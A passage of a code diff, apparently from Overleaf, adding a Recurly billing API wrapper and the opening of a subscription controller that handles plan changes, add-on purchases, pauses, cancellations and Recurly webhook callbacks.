+  async _createPaypalSubscription(user, subscriptionDetails, recurlyTokenIds) {
+    logger.debug(
+      { userId: user._id },
+      'starting process of creating paypal subscription'
+    )
+    // We run through each of these actions in sequence, passing a `cache`
+    // object along the way. The cache is initialized with the required data
+    // (user, token ids and subscription details).
+    const cache = { user, recurlyTokenIds, subscriptionDetails }
+    let result
+    try {
+      result = await RecurlyWrapper.promises._paypal.checkAccountExists(cache)
+      result = await RecurlyWrapper.promises._paypal.createAccount(result)
+      result = await RecurlyWrapper.promises._paypal.createBillingInfo(result)
+      result =
+        await RecurlyWrapper.promises._paypal.setAddressAndCompanyBillingInfo(
+          result
+        )
+      result = await RecurlyWrapper.promises._paypal.createSubscription(result)
+    } catch (err) {
+      OError.tag(err, 'error in paypal subscription creation process', {
+        user_id: user._id,
+      })
+      throw err
+    }
+    if (!result.subscription) {
+      const err = new Error('no subscription object in result')
+      OError.tag(err, 'error in paypal subscription creation process', {
+        user_id: user._id,
+      })
+      throw err
+    }
+    logger.debug(
+      { userId: user._id },
+      'done creating paypal subscription for user'
+    )
+    return result.subscription
+  },
+
+  async _createCreditCardSubscription(
+    user,
+    subscriptionDetails,
+    recurlyTokenIds
+  ) {
+    const data = {
+      plan_code: subscriptionDetails.plan_code,
+      currency: subscriptionDetails.currencyCode,
+      coupon_code: subscriptionDetails.coupon_code,
+      account: {
+        account_code: user._id,
+        email: user.email,
+        first_name: subscriptionDetails.first_name || user.first_name,
+        last_name: subscriptionDetails.last_name || user.last_name,
+        billing_info: {
+          token_id: recurlyTokenIds.billing,
+        },
+      },
+    }
+    if (recurlyTokenIds.threeDSecureActionResult) {
+      data.account.billing_info.three_d_secure_action_result_token_id =
+        recurlyTokenIds.threeDSecureActionResult
+    }
+    if (subscriptionDetails.subscription_add_ons) {
+      data.subscription_add_ons = subscriptionDetails.subscription_add_ons
+    }
+
+    const customFields =
+      getCustomFieldsFromSubscriptionDetails(subscriptionDetails)
+    if (customFields) {
+      data.custom_fields = customFields
+    }
+    let requestBody
+    try {
+      requestBody = RecurlyWrapper._buildXml('subscription', data)
+    } catch (error) {
+      throw OError.tag(error, 'error building xml', { user_id: user._id })
+    }
+
+    const { response, body } = await RecurlyWrapper.promises.apiRequest({
+      url: 'subscriptions',
+      method: 'POST',
+      body: requestBody,
+      expect422: true,
+    })
+
+    if (response.status === 422) {
+      return await RecurlyWrapper.promises._handle422Response(body)
+    } else {
+      return await RecurlyWrapper.promises._parseSubscriptionXml(body)
+    }
+  },
+
+  async createSubscription(user, subscriptionDetails, recurlyTokenIds) {
+    const { isPaypal } = subscriptionDetails
+    logger.debug(
+      
userId: user._id, isPaypal }, + 'setting up subscription in recurly' + ) + const fn = isPaypal + ? RecurlyWrapper.promises._createPaypalSubscription + : RecurlyWrapper.promises._createCreditCardSubscription + return fn(user, subscriptionDetails, recurlyTokenIds) + }, + + /** + * @param options - the options to pass to the request library + * @returns {Promise<{ response: unknown, body: string}>} + */ + async apiRequest({ expect404, expect422, url, qs, ...fetchOptions }) { + const fetchUrl = new URL(RecurlyWrapper.apiUrl) + fetchUrl.pathname = + fetchUrl.pathname !== '/' ? `${fetchUrl.pathname}/${url}` : url + + if (qs) { + for (const [key, value] of Object.entries(qs)) { + fetchUrl.searchParams.set(key, value) + } + } + fetchOptions.headers = { + Authorization: `Basic ${Buffer.from( + Settings.apis.recurly.apiKey + ).toString('base64')}`, + Accept: 'application/xml', + 'Content-Type': 'application/xml; charset=utf-8', + 'X-Api-Version': Settings.apis.recurly.apiVersion, + } + + try { + return await fetchStringWithResponse(fetchUrl, fetchOptions) + } catch (error) { + if (error instanceof RequestFailedError) { + if (error.response.status === 404 && expect404) { + return { response: error.response, body: null } + } else if (error.response.status === 422 && expect422) { + return { response: error.response, body: error.body } + } + + if (fetchOptions.headers.Authorization) { + fetchOptions.headers.Authorization = 'REDACTED' + } + logger.warn( + { + err: error, + body: error.body, + options: fetchOptions, + url: fetchUrl.href, + statusCode: error.response?.status, + }, + 'error returned from recurly' + ) + throw new OError( + `Recurly API returned with status code: ${error.response.status}`, + { statusCode: error.response.status } + ) + } else { + throw error + } + } + }, + + async getSubscriptions(accountId) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}/subscriptions`, + }) + return await RecurlyWrapper.promises._parseXml(body) + }, + + async getSubscription(subscriptionId, options) { + let url + if (!options) { + options = {} + } + + if (options.recurlyJsResult) { + url = `recurly_js/result/${subscriptionId}` + } else { + url = `subscriptions/${subscriptionId}` + } + + const { body } = await RecurlyWrapper.promises.apiRequest({ + url, + }) + + const recurlySubscription = + await RecurlyWrapper.promises._parseSubscriptionXml(body) + + if (options.includeAccount) { + let accountId + if (recurlySubscription.account && recurlySubscription.account.url) { + accountId = recurlySubscription.account.url.match(/accounts\/(.*)/)[1] + } else { + throw new Error("I don't understand the response from Recurly") + } + + recurlySubscription.account = + await RecurlyWrapper.promises.getAccount(accountId) + + return recurlySubscription + } else { + return recurlySubscription + } + }, + + /** + * @typedef {{getNextPage: () => Promise<PageData>, items: any[]}} PageData + */ + + async getPaginatedEndpoint(resource, queryParams) { + let allItems = [] + let items + + /** @type {() => Promise<PageData>} */ + let getNextPage = promises.getPaginatedEndpointIterator( + resource, + queryParams + ) + while (getNextPage) { + ;({ items, getNextPage } = await getNextPage()) + allItems = allItems.concat(items) + logger.debug(`total now ${allItems.length}`) + } + return allItems + }, + + /** + * @returns {() => Promise<PageData>} + */ + getPaginatedEndpointIterator(resource, queryParams) { + queryParams.per_page = queryParams.per_page || 200 + const getPage = async (cursor = 
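+    // Usage sketch for the iterator (the 'coupons' resource name is
+    // hypothetical). Each call to the returned function resolves with
+    // { items, getNextPage }; getNextPage is falsy once the Link response
+    // header carries no further cursor, which is what ends the loop in
+    // getPaginatedEndpoint above:
+    //
+    //   let next = RecurlyWrapper.promises.getPaginatedEndpointIterator('coupons', {})
+    //   while (next) {
+    //     const { items, getNextPage } = await next()
+    //     console.log(`got ${items.length} items`)
+    //     next = getNextPage
+    //   }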
null) => { + const opts = { + url: resource, + qs: queryParams, + } + if (cursor) { + opts.qs.cursor = cursor + } + const { response, body } = await RecurlyWrapper.promises.apiRequest(opts) + + const data = await RecurlyWrapper.promises._parseXml(body) + + const items = data[resource] + logger.debug(`got ${items.length} items in this page`) + const match = response.headers.link?.match(/cursor=([0-9.]+%3A[0-9.]+)&/) + const nextCursor = match && match[1] + return { + items, + getNextPage: + nextCursor && (() => getPage(decodeURIComponent(nextCursor))), + } + } + return getPage + }, + + async getAccount(accountId) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}`, + }) + return await RecurlyWrapper.promises._parseAccountXml(body) + }, + + updateAccountEmailAddress, + + async getCoupon(couponCode) { + const opts = { url: `coupons/${couponCode}` } + const { body } = await RecurlyWrapper.promises.apiRequest(opts) + return await RecurlyWrapper.promises._parseCouponXml(body) + }, + + async getBillingInfo(accountId) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}/billing_info`, + }) + return await RecurlyWrapper.promises._parseXml(body) + }, + + async getAccountPastDueInvoices(accountId) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}/invoices`, + qs: { state: 'past_due' }, + }) + return await RecurlyWrapper.promises._parseInvoicesXml(body) + }, + + async attemptInvoiceCollection(invoiceId) { + return await RecurlyWrapper.promises.apiRequest({ + url: `invoices/${invoiceId}/collect`, + method: 'PUT', + }) + }, + + async updateSubscription(subscriptionId, options) { + logger.debug( + { subscriptionId, options }, + 'telling recurly to update subscription' + ) + const data = { + plan_code: options.plan_code, + timeframe: options.timeframe, + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('subscription', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { subscriptionId }) + } + + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `subscriptions/${subscriptionId}`, + method: 'PUT', + body: requestBody, + }) + return await RecurlyWrapper.promises._parseSubscriptionXml(body) + }, + + async createFixedAmountCoupon( + couponCode, + name, + currencyCode, + discountInCents, + planCode + ) { + const data = { + coupon_code: couponCode, + name, + discount_type: 'dollars', + discount_in_cents: {}, + plan_codes: { + plan_code: planCode, + }, + applies_to_all_plans: false, + } + data.discount_in_cents[currencyCode] = discountInCents + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('coupon', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { + couponCode, + name, + }) + } + + logger.debug({ couponCode, requestBody }, 'creating coupon') + try { + await RecurlyWrapper.promises.apiRequest({ + url: 'coupons', + method: 'POST', + body: requestBody, + }) + } catch (error) { + logger.warn({ err: error, couponCode }, 'error creating coupon') + throw error + } + }, + + async lookupCoupon(couponCode) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `coupons/${couponCode}`, + }) + return await RecurlyWrapper.promises._parseCouponXml(body) + }, + + async redeemCoupon(accountCode, couponCode) { + const data = { + account_code: accountCode, + currency: 'USD', + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('redemption', data) + } catch (error) { + 
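+      // For reference, the redemption payload built above is tiny; with the
+      // headless, tab-indented xml2js Builder used by _buildXml it serializes
+      // roughly as (account code hypothetical):
+      //
+      //   <redemption>
+      //     <account_code>abc123</account_code>
+      //     <currency>USD</currency>
+      //   </redemption>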
throw OError.tag(error, 'error building xml', {
+        accountCode,
+        couponCode,
+      })
+    }
+
+    logger.debug(
+      { accountCode, couponCode, requestBody },
+      'redeeming coupon for user'
+    )
+    try {
+      await RecurlyWrapper.promises.apiRequest({
+        url: `coupons/${couponCode}/redeem`,
+        method: 'POST',
+        body: requestBody,
+      })
+    } catch (error) {
+      logger.warn(
+        { err: error, accountCode, couponCode },
+        'error redeeming coupon'
+      )
+      throw error
+    }
+  },
+
+  async extendTrial(subscriptionId, daysUntilExpire) {
+    if (daysUntilExpire == null) {
+      daysUntilExpire = 7
+    }
+    const nextRenewalDate = new Date()
+    nextRenewalDate.setDate(nextRenewalDate.getDate() + daysUntilExpire)
+    logger.debug(
+      { subscriptionId, daysUntilExpire },
+      'extending free trial for user'
+    )
+    try {
+      await RecurlyWrapper.promises.apiRequest({
+        url: `subscriptions/${subscriptionId}/postpone`,
+        qs: { bulk: false, next_bill_date: nextRenewalDate },
+        method: 'PUT',
+      })
+    } catch (error) {
+      logger.warn(
+        { err: error, subscriptionId, daysUntilExpire },
+        'error extending trial'
+      )
+      throw error
+    }
+  },
+
+  async listAccountActiveSubscriptions(accountId) {
+    const { response, body } = await RecurlyWrapper.promises.apiRequest({
+      url: `accounts/${accountId}/subscriptions`,
+      qs: {
+        state: 'active',
+      },
+      expect404: true,
+    })
+    if (response.status === 404) {
+      return []
+    } else {
+      return await RecurlyWrapper.promises._parseSubscriptionsXml(body)
+    }
+  },
+
+  async _handle422Response(body) {
+    const data = await RecurlyWrapper.promises._parseErrorsXml(body)
+    let errorData = {}
+    if (data.transaction_error) {
+      errorData = {
+        message: data.transaction_error.merchant_message,
+        info: {
+          category: data.transaction_error.error_category,
+          gatewayCode: data.transaction_error.gateway_error_code,
+          public: {
+            code: data.transaction_error.error_code,
+            message: data.transaction_error.customer_message,
+          },
+        },
+      }
+      if (data.transaction_error.three_d_secure_action_token_id) {
+        errorData.info.public.threeDSecureActionTokenId =
+          data.transaction_error.three_d_secure_action_token_id
+      }
+    } else if (data.error && data.error._) {
+      // fallback for errors that don't have a `transaction_error` field, but
+      // instead an `error` field with a message (e.g.
VATMOSS errors) + errorData = { + info: { + public: { + message: data.error._, + }, + }, + } + } + throw new SubscriptionErrors.RecurlyTransactionError(errorData) + }, + + async _parseSubscriptionsXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'subscriptions' + ) + }, + async _parseSubscriptionXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'subscription' + ) + }, + async _parseAccountXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'account' + ) + }, + async _parseBillingInfoXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'billing_info' + ) + }, + async _parseRedemptionsXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'redemptions' + ) + }, + async _parseCouponXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute(xml, 'coupon') + }, + async _parseErrorsXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute(xml, 'errors') + }, + async _parseInvoicesXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'invoices' + ) + }, + + async _parseXmlAndGetAttribute(xml, attribute) { + const data = await RecurlyWrapper.promises._parseXml(xml) + if (data && data[attribute] != null) { + return data[attribute] + } else { + throw new Error("I don't understand the response from Recurly") + } + }, + + /** + * @param xml + */ + _parseXml(xml) { + function convertDataTypes(data) { + let key, value + if (data && data.$) { + if (data.$.nil === 'nil') { + data = null + } else if (data.$.href) { + data.url = data.$.href + delete data.$ + } else if (data.$.type === 'integer') { + data = parseInt(data._, 10) + } else if (data.$.type === 'datetime') { + data = new Date(data._) + } else if (data.$.type === 'array') { + delete data.$ + let array = [] + for (key in data) { + value = data[key] + if (value instanceof Array) { + array = array.concat(convertDataTypes(value)) + } else { + array.push(convertDataTypes(value)) + } + } + data = array + } + } + + if (data instanceof Array) { + data = data.map(entry => convertDataTypes(entry)) + } else if (typeof data === 'object') { + for (key in data) { + value = data[key] + data[key] = convertDataTypes(value) + } + } + return data + } + + const parser = new xml2js.Parser({ + explicitRoot: true, + explicitArray: false, + emptyTag: '', + }) + return new Promise((resolve, reject) => + parser.parseString(xml, function (error, data) { + if (error) { + return reject(error) + } + const result = convertDataTypes(data) + resolve(result) + }) + ) + }, +} + +function _buildXml(rootName, data) { + const options = { + headless: true, + renderOpts: { + pretty: true, + indent: '\t', + }, + rootName, + } + const builder = new xml2js.Builder(options) + return builder.buildObject(data) +} + +const RecurlyWrapper = { + apiUrl: Settings.apis.recurly.url || 'https://api.recurly.com/v2', + _buildXml, + _parseXml: callbackify(promises._parseXml), + createFixedAmountCoupon: callbackify(promises.createFixedAmountCoupon), + getBillingInfo: callbackify(promises.getBillingInfo), + getPaginatedEndpoint: callbackify(promises.getPaginatedEndpoint), + getSubscription: callbackify(promises.getSubscription), + getSubscriptions: callbackify(promises.getSubscriptions), + updateAccountEmailAddress: callbackify(promises.updateAccountEmailAddress), +} + +RecurlyWrapper.promises = { + ...promises, + updateAccountEmailAddress, +} + +module.exports = RecurlyWrapper 
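+
+// A hedged sketch of what _parseXml's convertDataTypes does with Recurly's
+// typed XML (input and output abbreviated, values hypothetical):
+//
+//   <account href="https://api.recurly.com/v2/accounts/abc123">
+//     <created_at type="datetime">2025-01-01T00:00:00Z</created_at>
+//     <quantity type="integer">3</quantity>
+//   </account>
+//
+// parses to roughly:
+//
+//   {
+//     account: {
+//       url: 'https://api.recurly.com/v2/accounts/abc123',
+//       created_at: new Date('2025-01-01T00:00:00Z'),
+//       quantity: 3,
+//     },
+//   }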
+ +function getCustomFieldsFromSubscriptionDetails(subscriptionDetails) { + if (!subscriptionDetails.ITMCampaign) { + return null + } + + const customFields = [ + { + name: 'itm_campaign', + value: subscriptionDetails.ITMCampaign, + }, + ] + if (subscriptionDetails.ITMContent) { + customFields.push({ + name: 'itm_content', + value: subscriptionDetails.ITMContent, + }) + } + if (subscriptionDetails.ITMReferrer) { + customFields.push({ + name: 'itm_referrer', + value: subscriptionDetails.ITMReferrer, + }) + } + return { custom_field: customFields } +} + +function getAddressFromSubscriptionDetails( + subscriptionDetails, + includeCompanyInfo +) { + const { address } = subscriptionDetails + + if (!address || !address.country) { + throw new Errors.InvalidError({ + message: 'Invalid country', + info: { + public: { + message: 'Invalid country', + }, + }, + }) + } + + const addressObject = { + address1: address.address1, + address2: address.address2 || '', + city: address.city || '', + state: address.state || '', + zip: address.zip || '', + country: address.country, + } + + if ( + includeCompanyInfo && + subscriptionDetails.billing_info && + subscriptionDetails.billing_info.company && + subscriptionDetails.billing_info.company !== '' + ) { + addressObject.company = subscriptionDetails.billing_info.company + if ( + subscriptionDetails.billing_info.vat_number && + subscriptionDetails.billing_info.vat_number !== '' + ) { + addressObject.vat_number = subscriptionDetails.billing_info.vat_number + } + } + + return addressObject +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionController.js b/services/web/app/src/Features/Subscription/SubscriptionController.js new file mode 100644 index 0000000..838b580 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionController.js @@ -0,0 +1,804 @@ +// @ts-check + +const SessionManager = require('../Authentication/SessionManager') +const SubscriptionHandler = require('./SubscriptionHandler') +const SubscriptionViewModelBuilder = require('./SubscriptionViewModelBuilder') +const LimitationsManager = require('./LimitationsManager') +const RecurlyWrapper = require('./RecurlyWrapper') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const GeoIpLookup = require('../../infrastructure/GeoIpLookup') +const FeaturesUpdater = require('./FeaturesUpdater') +const GroupPlansData = require('./GroupPlansData') +const V1SubscriptionManager = require('./V1SubscriptionManager') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const RecurlyEventHandler = require('./RecurlyEventHandler') +const { expressify } = require('@overleaf/promise-utils') +const OError = require('@overleaf/o-error') +const { DuplicateAddOnError, AddOnNotPresentError } = require('./Errors') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') +const AuthorizationManager = require('../Authorization/AuthorizationManager') +const Modules = require('../../infrastructure/Modules') +const async = require('async') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const RecurlyClient = require('./RecurlyClient') +const { AI_ADD_ON_CODE } = require('./PaymentProviderEntities') +const PlansLocator = require('./PlansLocator') +const PaymentProviderEntities = require('./PaymentProviderEntities') + +/** + * @import { SubscriptionChangeDescription } from '../../../../types/subscription/subscription-change-preview' + * @import { SubscriptionChangePreview } from 
'../../../../types/subscription/subscription-change-preview' + * @import { PaymentProviderSubscriptionChange } from './PaymentProviderEntities' + * @import { PaymentMethod } from './types' + */ + +const groupPlanModalOptions = Settings.groupPlanModalOptions + +function formatGroupPlansDataForDash() { + return { + plans: [...groupPlanModalOptions.plan_codes], + sizes: [...groupPlanModalOptions.sizes], + usages: [...groupPlanModalOptions.usages], + priceByUsageTypeAndSize: JSON.parse(JSON.stringify(GroupPlansData)), + } +} + +async function userSubscriptionPage(req, res) { + const user = SessionManager.getSessionUser(req.session) + await SplitTestHandler.promises.getAssignment(req, res, 'pause-subscription') + + const groupPricingDiscount = await SplitTestHandler.promises.getAssignment( + req, + res, + 'group-discount-10' + ) + + const showGroupDiscount = groupPricingDiscount.variant === 'enabled' + + const results = + await SubscriptionViewModelBuilder.promises.buildUsersSubscriptionViewModel( + user, + req.i18n.language + ) + const { + personalSubscription, + memberGroupSubscriptions, + managedGroupSubscriptions, + currentInstitutionsWithLicence, + managedInstitutions, + managedPublishers, + } = results + const { hasSubscription } = + await LimitationsManager.promises.userHasSubscription(user) + + const userCanExtendTrial = ( + await Modules.promises.hooks.fire('userCanExtendTrial', user) + )?.[0] + const fromPlansPage = req.query.hasSubscription + const plansData = + SubscriptionViewModelBuilder.buildPlansListForSubscriptionDash( + personalSubscription?.plan + ) + + AnalyticsManager.recordEventForSession(req.session, 'subscription-page-view') + + const groupPlansDataForDash = formatGroupPlansDataForDash() + + // display the Group Settings button only to admins of group subscriptions with either/or the Managed Users or Group SSO feature available + let groupSettingsEnabledFor + try { + const managedGroups = await async.filter( + managedGroupSubscriptions || [], + async subscription => { + const managedUsersResults = await Modules.promises.hooks.fire( + 'hasManagedUsersFeature', + subscription + ) + const groupSSOResults = await Modules.promises.hooks.fire( + 'hasGroupSSOFeature', + subscription + ) + const isGroupAdmin = + (subscription.admin_id._id || subscription.admin_id).toString() === + user._id.toString() + return ( + (managedUsersResults?.[0] === true || + groupSSOResults?.[0] === true) && + isGroupAdmin + ) + } + ) + groupSettingsEnabledFor = managedGroups.map(subscription => + subscription._id.toString() + ) + } catch (error) { + logger.error( + { err: error }, + 'Failed to list groups with group settings enabled' + ) + } + + let groupSettingsAdvertisedFor + try { + const managedGroups = await async.filter( + managedGroupSubscriptions || [], + async subscription => { + const managedUsersResults = await Modules.promises.hooks.fire( + 'hasManagedUsersFeatureOnNonProfessionalPlan', + subscription + ) + const groupSSOResults = await Modules.promises.hooks.fire( + 'hasGroupSSOFeatureOnNonProfessionalPlan', + subscription + ) + const isGroupAdmin = + (subscription.admin_id._id || subscription.admin_id).toString() === + user._id.toString() + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + return ( + (managedUsersResults?.[0] === true || + groupSSOResults?.[0] === true) && + isGroupAdmin && + plan?.canUseFlexibleLicensing + ) + } + ) + groupSettingsAdvertisedFor = managedGroups.map(subscription => + subscription._id.toString() + ) + } catch (error) { + 
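+    // Non-fatal by design: if the hook lookups fail the dashboard still
+    // renders and groupSettingsAdvertisedFor simply stays undefined. Note
+    // that Modules.promises.hooks.fire resolves with one entry per module
+    // that registered the hook, which is why the code checks `?.[0] === true`.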
logger.error( + { err: error }, + 'Failed to list groups with group settings enabled for advertising' + ) + } + + const hasAiAssistViaWritefull = + await FeaturesUpdater.promises.hasFeaturesViaWritefull(user._id) + + const data = { + title: 'your_subscription', + plans: plansData?.plans, + planCodesChangingAtTermEnd: plansData?.planCodesChangingAtTermEnd, + user, + hasSubscription, + fromPlansPage, + personalSubscription, + userCanExtendTrial, + memberGroupSubscriptions, + managedGroupSubscriptions, + managedInstitutions, + managedPublishers, + showGroupDiscount, + currentInstitutionsWithLicence, + canUseFlexibleLicensing: + personalSubscription?.plan?.canUseFlexibleLicensing, + groupPlans: groupPlansDataForDash, + groupSettingsAdvertisedFor, + groupSettingsEnabledFor, + isManagedAccount: !!req.managedBy, + userRestrictions: Array.from(req.userRestrictions || []), + hasAiAssistViaWritefull, + } + res.render('subscriptions/dashboard-react', data) +} + +async function successfulSubscription(req, res) { + const user = SessionManager.getSessionUser(req.session) + + const { personalSubscription } = + await SubscriptionViewModelBuilder.promises.buildUsersSubscriptionViewModel( + user, + req.i18n.language + ) + + const postCheckoutRedirect = req.session?.postCheckoutRedirect + + if (!personalSubscription) { + res.redirect('/user/subscription/plans') + } else { + res.render('subscriptions/successful-subscription-react', { + title: 'thank_you', + personalSubscription, + postCheckoutRedirect, + user, + }) + } +} + +async function pauseSubscription(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + const pauseCycles = req.params.pauseCycles + if (!('pauseCycles' in req.params)) { + return HttpErrorHandler.badRequest( + req, + res, + `Pausing subscription requires a 'pauseCycles' argument with number of billing cycles to pause for` + ) + } + if (pauseCycles < 0) { + return HttpErrorHandler.badRequest( + req, + res, + `'pauseCycles' should be a number of billing cycles to pause for, or 0 to cancel a pending pause` + ) + } + logger.debug( + { userId: user._id }, + `pausing subscription for ${pauseCycles} billing cycles` + ) + try { + await SubscriptionHandler.promises.pauseSubscription(user, pauseCycles) + + const { subscription } = + await LimitationsManager.promises.userHasSubscription(user) + + AnalyticsManager.recordEventForUserInBackground( + user._id, + 'subscription-pause-scheduled', + { + pause_length: pauseCycles, + plan_code: subscription?.planCode, + subscriptionId: subscription?.recurlySubscription_id, + } + ) + + return res.sendStatus(200) + } catch (err) { + if (err instanceof Error) { + OError.tag(err, 'something went wrong pausing subscription', { + user_id: user._id, + }) + } + return next(err) + } +} + +async function resumeSubscription(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, `resuming subscription`) + try { + await SubscriptionHandler.promises.resumeSubscription(user) + return res.sendStatus(200) + } catch (err) { + if (err instanceof Error) { + OError.tag(err, 'something went wrong resuming subscription', { + user_id: user._id, + }) + } + return next(err) + } +} + +function cancelSubscription(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, 'canceling subscription') + SubscriptionHandler.cancelSubscription(user, function (err) { + if (err) { + OError.tag(err, 'something went wrong canceling subscription', { + user_id: 
user._id, + }) + return next(err) + } + // Note: this redirect isn't used in the main flow as the redirection is + // handled by Angular + res.redirect('/user/subscription/canceled') + }) +} + +/** + * @returns {Promise<void>} + */ +async function canceledSubscription(req, res, next) { + return res.render('subscriptions/canceled-subscription-react', { + title: 'subscription_canceled', + user: SessionManager.getSessionUser(req.session), + }) +} + +function cancelV1Subscription(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + logger.debug({ userId }, 'canceling v1 subscription') + V1SubscriptionManager.cancelV1Subscription(userId, function (err) { + if (err) { + OError.tag(err, 'something went wrong canceling v1 subscription', { + userId, + }) + return next(err) + } + res.redirect('/user/subscription') + }) +} + +async function previewAddonPurchase(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const addOnCode = req.params.addOnCode + + if (addOnCode !== AI_ADD_ON_CODE) { + return HttpErrorHandler.notFound(req, res, `Unknown add-on: ${addOnCode}`) + } + + const paymentMethod = await RecurlyClient.promises.getPaymentMethod(userId) + + let subscriptionChange + try { + subscriptionChange = + await SubscriptionHandler.promises.previewAddonPurchase(userId, addOnCode) + + const hasAiAssistViaWritefull = + await FeaturesUpdater.promises.hasFeaturesViaWritefull(userId) + const isAiUpgrade = + PaymentProviderEntities.subscriptionChangeIsAiAssistUpgrade( + subscriptionChange + ) + if (hasAiAssistViaWritefull && isAiUpgrade) { + return res.redirect( + '/user/subscription?redirect-reason=writefull-entitled' + ) + } + } catch (err) { + if (err instanceof DuplicateAddOnError) { + return res.redirect('/user/subscription?redirect-reason=double-buy') + } + throw err + } + + const subscription = subscriptionChange.subscription + const addOn = await RecurlyClient.promises.getAddOn( + subscription.planCode, + addOnCode + ) + + /** @type {SubscriptionChangePreview} */ + const changePreview = makeChangePreview( + { + type: 'add-on-purchase', + addOn: { + code: addOn.code, + name: addOn.name, + }, + }, + subscriptionChange, + paymentMethod + ) + + res.render('subscriptions/preview-change', { changePreview }) +} + +async function purchaseAddon(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + const addOnCode = req.params.addOnCode + // currently we only support having a quantity of 1 + const quantity = 1 + // currently we only support one add-on, the Ai add-on + if (addOnCode !== AI_ADD_ON_CODE) { + return res.sendStatus(404) + } + + logger.debug({ userId: user._id, addOnCode }, 'purchasing add-ons') + try { + await SubscriptionHandler.promises.purchaseAddon( + user._id, + addOnCode, + quantity + ) + return res.sendStatus(200) + } catch (err) { + if (err instanceof DuplicateAddOnError) { + HttpErrorHandler.badRequest( + req, + res, + 'Your subscription already includes this add-on', + { addon: addOnCode } + ) + } else { + if (err instanceof Error) { + OError.tag(err, 'something went wrong purchasing add-ons', { + user_id: user._id, + addOnCode, + }) + } + return next(err) + } + } +} + +async function removeAddon(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + const addOnCode = req.params.addOnCode + + if (addOnCode !== AI_ADD_ON_CODE) { + return res.sendStatus(404) + } + + logger.debug({ userId: user._id, addOnCode }, 'removing add-ons') + + try { + await 
SubscriptionHandler.promises.removeAddon(user._id, addOnCode) + res.sendStatus(200) + } catch (err) { + if (err instanceof AddOnNotPresentError) { + HttpErrorHandler.badRequest( + req, + res, + 'Your subscription does not contain the requested add-on', + { addon: addOnCode } + ) + } else { + if (err instanceof Error) { + OError.tag(err, 'something went wrong removing add-ons', { + user_id: user._id, + addOnCode, + }) + } + return next(err) + } + } +} + +async function previewSubscription(req, res, next) { + const planCode = req.query.planCode + if (!planCode) { + return HttpErrorHandler.notFound(req, res, 'Missing plan code') + } + const plan = await RecurlyClient.promises.getPlan(planCode) + const userId = SessionManager.getLoggedInUserId(req.session) + const subscriptionChange = + await SubscriptionHandler.promises.previewSubscriptionChange( + userId, + planCode + ) + const paymentMethod = await RecurlyClient.promises.getPaymentMethod(userId) + const changePreview = makeChangePreview( + { + type: 'premium-subscription', + plan: { code: plan.code, name: plan.name }, + }, + subscriptionChange, + paymentMethod + ) + + res.render('subscriptions/preview-change', { changePreview }) +} + +function cancelPendingSubscriptionChange(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, 'canceling pending subscription change') + SubscriptionHandler.cancelPendingSubscriptionChange(user, function (err) { + if (err) { + OError.tag( + err, + 'something went wrong canceling pending subscription change', + { + user_id: user._id, + } + ) + return next(err) + } + res.redirect('/user/subscription') + }) +} + +function updateAccountEmailAddress(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + RecurlyWrapper.updateAccountEmailAddress( + user._id, + user.email, + function (error) { + if (error) { + return next(error) + } + res.sendStatus(200) + } + ) +} + +function reactivateSubscription(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, 'reactivating subscription') + try { + if (req.isManagedGroupAdmin) { + // allow admins to reactivate subscriptions + } else { + // otherwise require the user to have the reactivate-subscription permission + req.assertPermission('reactivate-subscription') + } + } catch (error) { + return next(error) + } + SubscriptionHandler.reactivateSubscription(user, function (err) { + if (err) { + OError.tag(err, 'something went wrong reactivating subscription', { + user_id: user._id, + }) + return next(err) + } + res.redirect('/user/subscription') + }) +} + +function recurlyCallback(req, res, next) { + logger.debug({ data: req.body }, 'received recurly callback') + const event = Object.keys(req.body)[0] + const eventData = req.body[event] + + RecurlyEventHandler.sendRecurlyAnalyticsEvent(event, eventData).catch(error => + logger.error( + { err: error }, + 'Failed to process analytics event on Recurly webhook' + ) + ) + + if ( + [ + 'new_subscription_notification', + 'updated_subscription_notification', + 'expired_subscription_notification', + 'subscription_paused_notification', + 'subscription_resumed_notification', + ].includes(event) + ) { + const recurlySubscription = eventData.subscription + SubscriptionHandler.syncSubscription( + recurlySubscription, + { ip: req.ip }, + function (err) { + if (err) { + return next(err) + } + res.sendStatus(200) + } + ) + } else if (event === 'billing_info_updated_notification') { + const 
